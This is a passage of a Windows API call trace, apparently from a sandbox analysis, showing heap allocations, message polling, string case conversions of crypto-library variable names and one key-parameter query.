(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0033.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.322] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da218 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.322] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.323] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.323] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.324] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0033.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.325] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.325] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.326] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.327] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.328] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.328] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.328] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da208, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da208*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.328] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.328] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.329] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.329] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.329] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.329] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.329] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.329] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.329] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.329] HeapFree (in: hHeap=0x770000, 